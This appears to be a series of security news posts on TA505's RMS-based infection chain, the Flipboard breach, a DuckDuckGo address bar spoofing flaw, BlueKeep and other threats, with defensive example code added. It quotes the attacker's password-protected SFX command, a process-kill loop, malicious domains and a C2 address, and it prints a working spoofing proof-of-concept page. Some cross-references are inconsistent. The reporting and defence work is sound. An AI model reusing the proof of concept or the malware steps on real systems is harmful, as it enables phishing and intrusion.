Figure 3. Example of junk instructions used in macro

Once the macro runs, it downloads two files from “kentona[.su” over TLS and stores them under “C:\Users\Public”: “rtegre.exe” and “wprgxyeqd79.exe”.

Hash: aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7
Threat: Generic
Brief Description: Trojan/Downloader (Executable file)
Ssdeep: 12288:3gL3qJxG5hfNV6oYYbDRcY4KhbmwPMCchbjBxwhrVm HAyzNkyRJK7hRMCQ:3mqkhfzYZY4kmgsbdm2HAENk0K7Dm

Table 2. Information about “rtegre.exe” downloaded from “kentona[.su”

Hash: 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2
Threat: Trojan
Brief Description: SFX (self-extracting archive) (Executable file)
Ssdeep: 49152:sIWB74MncmEWy4i1LkjoAwG2PI/mfqtftvMKcr+7Ao95 xQW1vB38PELaacVzWTV3:sICtHsJoMAwG

Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.su”

Figure 4. Files contained in “wprgxyeqd79.exe” (SFX)

The “wprgxyeqd79.exe” sample is actually a self-extracting archive (SFX) containing four files, which are extracted into the %TEMP% folder. It then executes “exit.exe”, which launches the “i.cmd” batch script.

Figure  5. “i.cmd” script contained in “pasmmm.exe”

This script pings “www[.cloudflare[.com” three times with a 3000 ms delay to test the victim machine's connectivity. If the host is reachable, the script renames a file called “kernel.dll” (obviously not the real one) to “uninstall.exe”, another misleading name, then runs it with the arguments “uninstall.exe x -pQELRatcwbU2EJ5 -y”.

“uninstall.exe” is itself another password-protected SFX archive, and the arguments are the usual archiver switches: “x” extracts its contents, “-p” supplies the archive password, and “-y” answers yes to every prompt. Its structure resembles that of “wprgxyeqd79.exe” (two of the files share the same names), but this time the contents are extracted into the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.

Figure 6. Files contained in “uninstall.exe” (SFX)

Once again the execution flow moves from “exit.exe” to “i.cmd”. This script is quite different from the previous one: it establishes persistence by creating a new entry named “Windows Anytime Upgrade” under the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, pointing to “winserv.exe” in the same folder, and then runs “winserv.exe”.

Figure 7. “i.cmd” script contained in “uninstall.exe”

An interesting part of the script is an endless loop that kills every “rundll32.exe” process on the victim machine, which generates a huge amount of noise, as visible in the following Process Explorer view.

:Repeat
taskkill /f /im "rundll32.exe" || goto :Repeat

Figure 8. List of malware’s processes

Anyway, just before the kill loop, the real malicious payload is executed: the “winserv.exe” file. Analyzing it in depth, we discovered it is actually the RMS (Remote Manipulator System) client by TektonIT, packed with MPRESS, a legitimate PE compressor, to hinder antivirus detection.

Figure 9. Information about MPress packer used in “winserv.exe” payload

TektonIT RMS is a remote administration tool, and here it gives the attacker complete access to the victim machine. Alongside the RMS executable is a file named “settings.dat” containing the custom configuration prepared by the attacker, including:

  • Server address and port the client will connect to
  • The password chosen by the attacker for the remote access
  • The ID associated to the victim client

All this information is loaded automatically by the RMS executable and first stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. On subsequent startups, the software loads its configuration directly from that key.

Figure 10. Registry key set by “winserv.exe” (on the left); “settings.dat” file (on the right)

The client then connects to the command and control server, hosted in Bulgaria at 217.12.201.159, part of a Virtual Dedicated Server subnet of AS21100, operated by ITL LLC.

Figure 11. C2’s parameters

The attack consists of a complex flow, summarized in the following scheme:

Figure 12. Complete infection chain
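The chain above leaves several host artefacts that are cheap to detect regardless of the sample hashes. What follows is an added example, not Yoroi's code or its YARA rules: a handful of detection rules in Python, run over constructed Sysmon-like events. The paths, file names, Run-key name and SFX command line come from the analysis; the event layout, the victim user name and the “Options” value name are assumptions. The rules match the Office process spawning an executable from a user-writable path, the password-protected SFX extraction, the Run key pointing into %ALLUSERSPROFILE%, the rundll32 kill loop, and the RMS parameters key.

```python
import re

# Constructed telemetry in a Sysmon-like shape (not real logs), following the
# order of the analysis: Excel runs the SFX, i.cmd extracts a password-protected
# SFX, a Run key is written, rundll32 is killed in a loop, RMS config is stored.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Users\Public\wprgxyeqd79.exe",
     "cmdline": r"C:\Users\Public\wprgxyeqd79.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\victim\AppData\Local\Temp\i.cmd"',
     "parent": r"C:\Users\victim\AppData\Local\Temp\exit.exe"},
    {"id": 3, "type": "process", "image": r"C:\Users\victim\AppData\Local\Temp\uninstall.exe",
     "cmdline": "uninstall.exe x -pQELRatcwbU2EJ5 -y",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Windows Anytime Upgrade",
     "data": r"C:\ProgramData\Windows Anytime Upgrade\winserv.exe"},
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": 'taskkill /f /im "rundll32.exe"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 6, "type": "registry",
     "key": r"HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters",
     "value": "Options", "data": "(binary blob)"},
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\notepad.exe",   # benign control
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

# %TEMP%, %ALLUSERSPROFILE% (C:\ProgramData) and C:\Users\Public: the user-writable
# locations this chain stages in and persists from.
USER_WRITABLE = re.compile(
    r"^(?:C:\\ProgramData\\|C:\\Users\\Public\\|C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\)", re.I)
OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")


def office_spawn_from_user_writable(ev):
    """An Office process starting an executable from a user-writable path (macro stage)."""
    return (ev["type"] == "process" and ev["parent"].lower().endswith(OFFICE_APPS)
            and USER_WRITABLE.match(ev["image"]) is not None)


def sfx_password_extract(ev):
    """Archiver-style SFX switches on a command line: x = extract, -p<password>, -y = assume yes."""
    return ev["type"] == "process" and re.search(r"\bx\s+-p\S+\s+-y\b", ev["cmdline"]) is not None


def run_key_to_user_writable(ev):
    """Run-key persistence whose target lives in a user-writable directory."""
    return (ev["type"] == "registry" and ev["key"].lower().endswith(r"\currentversion\run")
            and USER_WRITABLE.match(ev["data"]) is not None)


def rundll32_kill(ev):
    """taskkill against rundll32.exe, the noisy loop i.cmd runs."""
    return (ev["type"] == "process"
            and re.search(r"taskkill\b.*/im\s+\"?rundll32\.exe", ev["cmdline"], re.I) is not None)


def rms_config_written(ev):
    """TektonIT RMS host parameters being written under HKCU."""
    return ev["type"] == "registry" and "remote manipulator system" in ev["key"].lower()


RULES = [office_spawn_from_user_writable, sfx_password_extract, run_key_to_user_writable,
         rundll32_kill, rms_config_written]


def scan(events):
    """Return (event id, rule name) for every rule that fires, in event order."""
    return [(ev["id"], rule.__name__) for ev in events for rule in RULES if rule(ev)]


def looks_like_this_chain(hits, min_rules=3):
    """Any one rule is noisy on its own; several distinct ones on one host are not."""
    return len({name for _, name in hits}) >= min_rules
```

Each rule is deliberately generic (no hashes, no C2 address), so the detections survive the file-name churn the analysis observed in “veter1605_MAPS_10cr0.exe”; the correlation step is what keeps the false-positive rate tolerable.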

The TA505 Connection

After reconstructing the full infection chain, we noticed strong similarities with a recent spear-phishing campaign against an unspecified US retail company. That attack, as reported by CyberInt, used a command and control server located in Germany linked to the TA505 actor: a very active group, involved in cyber-criminal operations all around the world and threatening a wide range of high-profile companies, active since 2014.

Figure 13. Comparison between infection chains

The comparison of the infection chains shows that in both cases the attacker used a pair of SFX stages to deploy “RMS”, a legitimate remote administration tool produced by the Russian company “TektonIT”, which grants the group remote access and full, direct control of the infected machine. Some code is reused directly across the analyzed campaigns, such as the “i.cmd” and “exit.exe” files, while some new components have been introduced, for instance “rtegre.exe” and the “veter1605_MAPS_10cr0.exe” file.

During the analysis we also noticed that “veter1605_MAPS_10cr0.exe” changed slightly from run to run: a few hours after the initial discovery, the infection chain dropped it with different icons, a different suffix (from “cr0” to “cr24”) and a different prefix (from “veter1605_” to “veter2005_”). This may indicate the campaign is still ongoing.

Conclusion

TA505 is one of the most active threat groups operating since 2014. It has traditionally targeted the banking and retail industries, as we recently documented in our analysis of the “Stealthy Email Stealer” that is part of its arsenal. The peculiarity of this recent attack wave is that it hit a company outside the banking and retail sectors, suggesting the group could be widening its operations.



Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/gobrut-a-new-golang-botnet/

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post TA505 is expanding its operations appeared first on Security Affairs.

News aggregator Flipboard disclosed a data breach

The news aggregator Flipboard announced that it suffered a breach, unauthorized users had access to some databases storing user account information.

The news and social media aggregator Flipboard disclosed on Tuesday that it suffered a breach, unauthorized users had access to some databases storing user information.

Hackers had access to the company's systems between June 2, 2018, and March 23, 2019, and again on April 21-22, 2019. On April 23, internal staff noticed suspicious activity in the infrastructure.

“We recently identified unauthorized access to some of our databases containing certain Flipboard users’ account information, including account credentials,” reads the incident notice published by Flipboard. “In response to this discovery, we immediately launched an investigation and an external security firm was engaged to assist. Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019.”


Flipboard has more than 145 million users, and it has not said how many of them are affected. Stolen records include names, usernames, password hashes, email addresses and, for some users, the digital tokens used to access Flipboard through third-party services.

Flipboard said that most passwords were hashed with bcrypt, while the passwords of users who had not logged in since March 14, 2012 were protected with uniquely salted SHA-1, an older and far faster hash that is much easier to brute-force offline.

Flipboard has found no evidence that the hackers accessed third-party accounts connected to users' accounts; as a precaution, the company nonetheless replaced or deleted all digital tokens. The extent of the breach is not yet clear, and the company has forced a password reset for all its users.
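The SHA-1 detail above is the usual consequence of upgrading password hashes only when a user next logs in: dormant accounts keep the weak scheme. The added example below (not Flipboard's code; scrypt from the Python standard library stands in for bcrypt, and the record layout, field names and salts are assumptions) shows both that migrate-on-login pattern and the alternative that also covers dormant accounts: wrapping the stored legacy digest in the slow KDF without needing the password.

```python
import hashlib
import hmac
import os

# scrypt (standard library) stands in for bcrypt, which is a third-party package.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def sha1_salted(password, salt):
    """The legacy scheme: one fast SHA-1 over salt||password. A unique salt
    defeats rainbow tables, but a GPU still tries billions of guesses a second."""
    return hashlib.sha1(salt + password.encode()).hexdigest()


def slow_hash(secret, salt):
    """Memory-hard KDF; the cost parameters are what make offline cracking expensive."""
    return hashlib.scrypt(secret, salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32).hex()


def new_record(password, salt=None):
    salt = salt or os.urandom(16)
    return {"scheme": "scrypt", "salt": salt, "hash": slow_hash(password.encode(), salt)}


def verify(record, password):
    scheme = record["scheme"]
    if scheme == "sha1":
        expected = sha1_salted(password, record["salt"])
    elif scheme == "scrypt":
        expected = slow_hash(password.encode(), record["salt"])
    elif scheme == "scrypt(sha1)":
        # Wrapped legacy hash: recompute the inner SHA-1, then the outer KDF.
        inner = sha1_salted(password, record["salt"])
        expected = slow_hash(inner.encode(), record["outer_salt"])
    else:
        raise ValueError("unknown scheme %r" % scheme)
    return hmac.compare_digest(expected, record["hash"])     # constant-time compare


def verify_and_upgrade(record, password):
    """Migrate-on-login: a correct password yields a fresh scrypt record.
    Only reaches users who log in; dormant accounts keep the weak hash."""
    if not verify(record, password):
        return False, record
    if record["scheme"] != "scrypt":
        record = new_record(password)
    return True, record


def wrap_legacy(record):
    """Upgrade a dormant SHA-1 record without the password by feeding the stored
    digest through the slow KDF. Cracking now costs one scrypt per guess, and
    the bare SHA-1 value no longer sits in the database."""
    if record["scheme"] != "sha1":
        return record
    outer_salt = os.urandom(16)
    return {"scheme": "scrypt(sha1)", "salt": record["salt"], "outer_salt": outer_salt,
            "hash": slow_hash(record["hash"].encode(), outer_salt)}
```

Wrapping is a one-off batch job over every remaining legacy row, which is how a seven-year tail of SHA-1 hashes is avoided; the wrapped records can still be replaced by plain scrypt records the next time each user logs in.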

The news aggregator pointed out that it does not collect government-issued identifiers or financial data, so the breach did not expose those; the credentials and tokens listed above were exposed.

“Notably, Flipboard does not collect from users, and this incident did not involve, government issued IDs (such as Social Security numbers or driver’s license numbers), or payment card, bank account, or other financial information.” continues the security notice.

Flipboard reported the incident to the authorities and hired a security firm to help with the investigation.



Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post News aggregator Flipboard disclosed a data breach appeared first on Security Affairs.

DuckDuckGo Address Bar Spoofing

The DuckDuckGo Privacy Browser application 5.26.0 for Android allows address bar spoofing via a setInterval call, as demonstrated by reloading every 50 ms.

Technical Observation: the browser sits in the 5,000,000+ installs tier on Google Play. It was observed that the DuckDuckGo Privacy Browser omnibar can be spoofed by a crafted JavaScript page that uses `setInterval` to navigate to a URL every 10 to 50 ms: the address bar shows the target URL while the attacker's content stays on screen.

Proof of concept: (Gist)

<html>
<head>
<title>DuckDuckGo — Privacy, simplified.</title>
<style>
body { background-color: #5DBCD2; }
p.b { font-family: Arial, Helvetica, sans-serif; }
</style>
</head>
<body>
<h1 style="text-align:center;">We definitely store your <br> personal information. Ever.</h1>
<p class="b" style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal
information to 3rd parties.</p>
<img src="https://duckduckgo.com/assets/onboarding/bathroomguy/4-alpinist-v2.svg">
<script>
// Navigate to the real site every 50 ms: the omnibar shows duckduckgo.com while this page's content stays visible.
function fakefunction() { location = "https://duckduckgo.com/"; }
setInterval(fakefunction, 50);
</script>
</body>
</html>

The work is done by `fakefunction()`: the crafted page starts a navigation to the real https://duckduckgo.com/ every 50 ms, so the address bar displays duckduckgo.com while the page's own HTML, which the attacker can change at will, remains what the user sees.


The PoC above demonstrates the attack.
Timeline:
The issue was submitted to the DuckDuckGo team via HackerOne on Oct 31st, 2018. DuckDuckGo rewarded it with swag on Nov 13th, 2018, but the report was closed without a fix and marked as informative, with the note that the team did not view it as a serious issue. CVE-2019-12329 was later assigned to the issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/05/duckduckgo-address-bar-spoofing.html



Pierluigi Paganini

(SecurityAffairs – Address Bar Spoofing, hacking)

The post DuckDuckGo Address Bar Spoofing appeared first on Security Affairs.

Internet scans found nearly one million systems vulnerable to BlueKeep

Roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Yesterday I reported the discovery made by experts at GreyNoise that detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability.

The scans were first detected on May 25, 2019; experts explained that a single threat actor launched them from the Tor network to hide its identity.

Bad Packets researchers also observed scanning activity associated with BlueKeep; most of the requests originated from the Netherlands, Russia and China.

The vulnerability, tracked as CVE-2019-0708, affects Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is wormable: malware authors can use it to build self-propagating code in the style of WannaCry.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it, for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), which forces the client to authenticate before the vulnerable part of the connection sequence is reached, and the threat can also be mitigated by blocking TCP port 3389 at the perimeter.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, founder of the zero-day broker Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts also announced that they had successfully developed exploits for BlueKeep, including Kaspersky, Check Point and MalwareTech.

Now the popular expert Robert Graham has scanned the Internet for vulnerable systems. He found more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan.

The initial masscan sweep took a couple of hours and found every host answering on the Remote Desktop port: 7,629,102 results.

“However, there is a lot of junk out there that’ll respond on this port. Only about half are actually Remote Desktop.” explained Graham. “Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It’s a thousand times slower, but it’s only scanning the results from masscan instead of the entire Internet.”

The scan revealed 923,671 potentially vulnerable systems, and it is likely that attackers will launch a massive offensive in the coming weeks.

“The upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug. Hackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines. ” Graham added.

Below the detailed results of the scans conducted by the expert:

  • 1447579  UNKNOWN - receive timeout
  • 1414793  SAFE - Target appears patched
  • 1294719  UNKNOWN - connection reset by peer
  • 1235448  SAFE - CredSSP/NLA required
  • 923671  VULNERABLE - got appid
  • 651545  UNKNOWN - FIN received
  • 438480  UNKNOWN - connect timeout
  • 105721  UNKNOWN - connect failed 9
  • 82836  SAFE - not RDP but HTTP
  • 24833  UNKNOWN - connection reset on connect
  • 3098  UNKNOWN - network error
  • 2576  UNKNOWN - connection terminated

In summary, over 1.4 million machines appear patched and 1.2 million require NLA, which blocks unauthenticated exploitation.
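The “CredSSP/NLA required” bucket above is decided by the very first exchange of an RDP connection, which can be checked without touching the vulnerable code path. The following added example (not Graham's rdpscan, and not code from the original post) builds the X.224 Connection Request with an RDP_NEG_REQ asking for plain RDP only, following the layout in MS-RDPBCGR, and classifies the server's Connection Confirm: a HYBRID_REQUIRED_BY_SERVER failure means NLA is enforced and unauthenticated exploitation is blocked; any other answer means the pre-authentication surface is reachable and the patch state still has to be determined, which rdpscan does by probing further. `build_connection_confirm` constructs the server side so the logic runs offline; `probe` performs the live exchange. The cookie user name and the wording of the result strings are assumptions.

```python
import socket
import struct

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x00, 0x01, 0x02       # requestedProtocols values
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}


def _tpkt_x224(code, payload):
    """Wrap an X.224 TPDU (code, DST-REF, SRC-REF, CLASS, payload) in a TPKT header."""
    tpdu = bytes([code]) + b"\x00\x00\x00\x00\x00" + payload
    tpdu = bytes([len(tpdu)]) + tpdu               # LI counts the bytes after itself
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu


def build_connection_request(requested=PROTOCOL_RDP, cookie=b"Cookie: mstshash=probe\r\n"):
    """Client side: X.224 Connection Request carrying an RDP_NEG_REQ that asks
    for plain RDP only. A server that insists on NLA has to refuse this."""
    neg = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    return _tpkt_x224(0xE0, cookie + neg)


def build_connection_confirm(selected=None, failure=None):
    """Server side, used here to construct test answers: a Connection Confirm
    with RDP_NEG_RSP, RDP_NEG_FAILURE, or no negotiation block (legacy server)."""
    if failure is not None:
        neg = struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, failure)
    elif selected is not None:
        neg = struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, selected)
    else:
        neg = b""
    return _tpkt_x224(0xD0, neg)


def classify_response(data):
    """Map the server's answer onto the buckets rdpscan reports."""
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        return "UNKNOWN - not an X.224 Connection Confirm"
    li = data[4]
    body = data[11:5 + li]                         # everything after CLASS
    if len(body) < 8:
        return "NLA NOT ENFORCED - legacy server, no RDP_NEG block (plain RDP)"
    ntype, _flags, _length, value = struct.unpack("<BBHI", body[:8])
    if ntype == TYPE_RDP_NEG_FAILURE:
        name = FAILURE_CODES.get(value, "code %d" % value)
        if value in (5, 6):
            return "SAFE - CredSSP/NLA required (%s)" % name
        return "NLA NOT ENFORCED - plain RDP refused but NLA not required (%s)" % name
    if ntype == TYPE_RDP_NEG_RSP:
        if value == PROTOCOL_HYBRID:
            return "SAFE - server selected CredSSP/NLA"
        accepted = "plain RDP" if value == PROTOCOL_RDP else "TLS without NLA"
        return "NLA NOT ENFORCED - server accepted %s" % accepted
    return "UNKNOWN - unexpected negotiation type %d" % ntype


def probe(host, port=3389, timeout=5.0):
    """Live check (not exercised offline): one connection, one request, one answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request())
        return classify_response(s.recv(1024))
```

A server answering SSL_REQUIRED_BY_SERVER is deliberately kept in the "not enforced" bucket: TLS protects the transport but still lets an unauthenticated client into the connection sequence, which is where BlueKeep lives; only CredSSP/NLA puts authentication in front of it.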

Finally, a micropatch for the BlueKeep vulnerability is available from 0patch; administrators can deploy it without a reboot to protect always-on servers.



Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Internet scans found nearly one million systems vulnerable to BlueKeep appeared first on Security Affairs.

ScarCruft, An Anti-North Korean Hacking Team

Malware authors continue to operate at an ever more sophisticated level, especially Advanced Persistent Threats (APTs). The group known as ScarCruft was exposed by Kaspersky Lab for running espionage campaigns that, among other things, harvest Bluetooth device information. ScarCruft targets government officials and businessmen operating in the Korean peninsula; its Bluetooth component does not break into phones over the air but runs on an infected Windows PC and catalogs the devices connected to it. The operation apparently started in 2018, using specially designed modular malware composed of many modules, with evading detection as one of its goals.

A Windows-based operation also exists. Once the group has a foothold on a target, a multi-stage infection follows that includes a tool exploiting CVE-2018-8120 to escalate privileges and get past User Account Control (UAC). “The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data,” explained Kaspersky Labs in their official blog.

The Windows version of the malware is a full-fledged backdoor suite that communicates with its command and control server. On receiving new information, the C&C instructs the malware to gather data according to parameters the operators choose, and the code can be updated remotely, which helps it bypass anti-malware software. With system-level access, the malware can execute Windows commands, including through PowerShell, and it persists across system reboots.

Once a persistent infection is established, the malware downloads a Bluetooth harvester module. Rather than intercepting traffic between the PC and a phone, it uses the Windows Bluetooth APIs on the infected PC to enumerate the Bluetooth devices connected to it and records their details, for espionage purposes. “We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth,” added Kaspersky Labs.

The researchers have no conclusive evidence tying ScarCruft to North Korea, given that a North Korean diplomatic agency was itself among the victims. A Hong Kong diplomatic agency with strong ties to North Korea was also reported to have fallen for the same espionage campaign, and an unnamed public agency in Russia showed signs of an infection similar to those reported at the Hong Kong and North Korean agencies, pointing to a threat actor focused on people connected with diplomatic ties between those nations.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve,” concluded Kaspersky Labs.

Related Resource:

North Korean Spy Charged For 2014 Sony Pictures Hack

North Korean Hackers Swindles over $1 billion

North Korean Hackers Stole Cryptocurrency Funds From South Korea

Over 100 Targets in US Hit By North Korean Hackers

The post ScarCruft, An Anti-North Korean Hacking Team appeared first on .

Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at Palo Alto Networks spotted new Shade ransomware campaigns targeting new countries, including the U.S. and Japan.

Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats on the cybercrime scene; it has been active at least since 2014, when a massive infection was observed in Russia. Shade infections increased during October 2018 and kept a constant pace until the second half of December 2018, paused around Christmas, and then resumed in mid-January 2019 at double the volume.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,” 

Most of the victims belong to the high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits; experts pointed out that its executable (EXE) has remained “remarkably consistent” since its discovery in 2014.

Once a Windows system is infected, the ransomware sets the desktop background to announce the infection and drops 10 text files on the Desktop, named README1.txt through README10.txt.

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.


The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.
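As an added example that is not part of the original post or of the Palo Alto Networks report, the following Python check looks for the ransom-note pattern described above in a Desktop directory. Only the README1.txt..README10.txt names and the banner text come from the report; the directory layout and the note contents are constructed for the demo, and a lone user-created README1.txt is deliberately not treated as a hit.

```python
import os
import re
import tempfile

# Shade drops exactly README1.txt .. README10.txt and announces itself with
# this banner (both reported by Palo Alto Networks). Everything else here is
# constructed for the example.
NOTE_RE = re.compile(r"^README(\d{1,2})\.txt$", re.IGNORECASE)
SHADE_BANNER = "All the important files on your disks were encrypted"


def shade_notes(desktop_dir):
    """Map note number -> file name for every README<n>.txt in desktop_dir."""
    notes = {}
    for name in os.listdir(desktop_dir):
        m = NOTE_RE.match(name)
        if m:
            notes[int(m.group(1))] = name
    return notes


def classify_desktop(desktop_dir):
    """'note-set': the full README1..README10 set Shade drops is present
       'banner'  : fewer notes, but at least one carries the ransom text
       None      : nothing Shade-like (a single user README1.txt is normal)"""
    notes = shade_notes(desktop_dir)
    if sorted(notes) == list(range(1, 11)):
        return "note-set"
    for name in notes.values():
        path = os.path.join(desktop_dir, name)
        with open(path, encoding="utf-8", errors="ignore") as fh:
            if SHADE_BANNER in fh.read():
                return "banner"
    return None


def build_sample_desktop(infected, notes=10):
    """Create a throwaway Desktop directory with constructed test files."""
    d = tempfile.mkdtemp(prefix="desktop-")
    if infected:
        for n in range(1, notes + 1):
            with open(os.path.join(d, f"README{n}.txt"), "w", encoding="utf-8") as fh:
                fh.write("Attention! " + SHADE_BANNER + ".\n")
    else:
        with open(os.path.join(d, "README1.txt"), "w", encoding="utf-8") as fh:
            fh.write("Notes for the Monday meeting\n")
    with open(os.path.join(d, "report.docx"), "w", encoding="utf-8") as fh:
        fh.write("unrelated user file\n")
    return d
```

Run it against every user's Desktop on a suspect host; a "note-set" result is a strong indicator, a "banner" result means a partially written note set and deserves the same response.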

The researchers noticed that all the malspam campaigns spreading the Shade ransomware retrieved an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian-speaking countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)

The post Shade Ransomware is very active outside of Russia and targets more English-speaking victims appeared first on Security Affairs.

Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw

Several products made by Siemens Healthineers are affected by the recently patched Windows BlueKeep vulnerability (CVE-2019-0708).

The BlueKeep issue is a remote code execution vulnerability in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker by connecting to the targeted system via RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities: it can be triggered without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

After the release of the security updates for BlueKeep, Siemens started assessing its Healthineers products. Siemens has now published six security advisories to warn its customers of the potential risks.

“Some Siemens Healthineers software products are affected by this vulnerability.” reads an advisory published by Siemens. “The exploitability of the vulnerability depends on the specific configuration and deployment environment of each product. Siemens Healthineers recommends installing the appropriate security patches released by Microsoft.”

The company pointed out that it cannot guarantee the compatibility of Microsoft security patches with products from Siemens Healthineers that are beyond their End of Support.


Impacted products include MagicLinkA, MagicView, Medicalis solutions, Screening Navigator, syngo solutions and teamplay (receiver software only).

For most of the products, the advisories suggest disabling RDP, blocking TCP port 3389, and implementing workarounds suggested by Microsoft.

Siemens also recommends ensuring that appropriate backups and system restoration procedures are in place, and suggests contacting the local Siemens Healthineers customer service engineer, the customer portal, or the Regional Support Center for remediation guidance.



Pierluigi Paganini

(SecurityAffairs – Healthineers, BlueKeep)

The post Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw appeared first on Security Affairs.

APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used them in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, the China-linked cyber-espionage group tracked as APT10 added two new loaders to its arsenal and used them against government and private organizations in Southeast Asia.

The group has been active at least since 2009. In April 2017, experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

